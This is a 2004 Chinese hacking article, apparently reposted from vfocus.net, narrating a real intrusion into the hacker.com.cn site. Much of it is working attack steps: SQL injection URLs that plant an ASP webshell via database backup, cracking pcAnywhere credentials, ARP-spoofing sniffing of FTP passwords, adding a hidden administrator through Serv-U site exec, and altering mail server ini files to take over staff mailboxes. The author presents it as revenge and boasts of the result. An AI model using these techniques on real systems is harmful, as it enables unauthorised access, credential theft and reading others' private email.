首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
黑客防线---主机外部的危险
来源:vfocus.net 作者:xiaolu 发布时间:2004-06-07  

黑客防线---主机外部的危险

By xiaolu

前言:不是我有意想搞你,而是你们有些过分了,拿着别人的稿子去卖钱,拿着别人的技术装点自己,这也无所谓。你们那种优越感让我不得不提醒你们一下,你们的优越是建立在别人付出之上的。

一、扫描,发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗,进行嗅探。

二、找嗅探主机:

C:\>ping www.hacker.com.cn

Pinging www.hacker.com.cn [211.157.102.239] with 32 bytes of data:

开始扫描 211.157.102.1-211.157.102.255 80+1433 端口,找到一个默认目录的站,然后找注入漏洞。

http://xx.xx.xx.xx/111.asp?id=3400 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))

发现不是sa权限:


http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)

得到库名ku1:


来吧,想办法搞个shell(此处感谢臭要饭的的资料),不理解的,多看看网上资料:

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[xiaolu] ([xiaoxue][char](255));--

http://xx.xx.xx.xx/111.asp?id=3400;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into xiaolu (xiaoxue) values(@result);--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1

得到了web路径d:\xxxx,接下来:

http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--

http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--

http://xx.xx.xx.xx/111.asp?id=3400;insert into cmd(str) values ('');--

http://xx.xx.xx.xx/111.asp?id=3400;backup database ku1 to disk='D:\xxxx\l.asp';--

(关于这种shell的利用,请参见最小的asp后门的动画http://666w.cn/down/view.asp?id=754)

上传..............shell,准备提升权限......,发现pcanywhere,找到:

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/PCA.xxx.CIF

流光破解密码,pcanywhere连接,看来上天比较帮助我,一切顺利,admin密码和pcanywhere密码一样,:),tracert 一下:

1 <10 ms <10 ms <10 ms 211.157.102.239

唉,该当黑防有此劫,可以进行arp欺骗。(关于arp欺骗,网上很多资料,bbs.666w.cn/dispbbs.asp?boardID=7&ID=764&page=1)

用webshell上传我们需要的软件:

WinPcap.exe arpsniffer.exe pv.exe

arpsniffer.exe ------------ 57 k 榕哥的交换环境下嗅探工具

pv.exe ----------------60k (PrcView附带的一个命令行程序,华军有下)杀进程

WinPcap.exe ------------------678k 嗅探所用到的一个驱动程序

安装WinPcap.exe,下一步,下一步,完成。

建立一个隐藏的虚拟目录(怎么建立自己去查资料),应用程序保护设为低 以便于我们用webshell运行arp程序,不然被管理员发现可就不好。

三、开始嗅探:

OK,继续........开始SNIFFER........由于目前中国网络结构和相关技术人员素质等问题.这个可以说是百发百中,运行:

arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:\111.txt 1

211.157.102.254是网关,211.157.102.239是黑防ip,c:\111.txt是log文件,1是网卡id

接下来要做什么?当然就是等了.......不过我们不想等几天时间.我们希望能再顺利些.告诉朋友行动起来,帮我一下,帮我告诉黑防编辑,你的站被黑了………

结果不用说了.几分钟后我拿到了ftp密码,因为arpsniffer进程在运行我们没法直接看,于是用webshell运行:

pv -k -f arpsniffer.exe

kill这个进程,看密码喽~~~~~~

四、工作中:

上传shell,呀!没做安全,盘全部可以浏览,目标在e:\wwwroot,提升全限,利用serv-u,呀怎么不能运行程序呀,呀,原来cmd.exe改成king.exe了呀,net.exe改成了net1king.exe呀,继续 fpipe -v -l 3041 -r 43958 127.0.0.1

添加ftp用户,设为管理员,登陆运行


quote site exec net1king xiaolu xiaoxue /add

quote site exec net1king localgroup administrators xiaolu /add


3389登陆,呀,不行呀,继续


quote site exec net1king xiaolu xiaoxue@@!#!@#@!!@#@123 /add

quote site exec net1king localgroup administrators xiaolu /add


哈哈,还作了密码限制,进去了。接下来我就不说了,让黑防编辑头疼去吧。。。。。。。。(此处省略N多内容)


看看有什么好东西吧,发现有webeasymail服务器哦.看信,看看让编辑们牛比的了不得的资料,不知道密码怎么看呀。


嘿嘿,跟我来:D:/mail/mail/,每个用户目录下都有UserWeb.ini

打开,修改

questionInfo = 1

answerInfo = 1

hintInfo = 1


打开http://hacker.com.cn/mail---忘记密码,添上我们的问题和答案,挖靠,这么多信,有没有没什么好东西啊


该撤退了,剩下的留给编辑们去搞吧。

五:总结:

本次入侵历时1个小时左右,没有什么高深的技术,都是些比较浅显的技术,嗅探渗透是好几年前的技术了,sql注入是比较流行的方法,也不算新了,能这么快得到ftp密码多亏了朋友的“社会工程学”的运用。

技术虽然很值钱,灵活运用会使技术更有价值。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·SQL脚本语言学习黑客篇
·怪异的SQL注入
·一次对孝感铁通网站的检测过程
·针对ACCESS漏洞又一发现
·BBS3000用户注册新漏洞的分析
·SQL Server应用程序中的高级SQL
·如何利用Sql 注入遍历目录
·mysql注入大全(一)
·ARP欺骗技术
·oracle注入大全(一)
·DVBBS7.0 --幕后的微笑
·让IE6.0执行EXE文件的网页
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved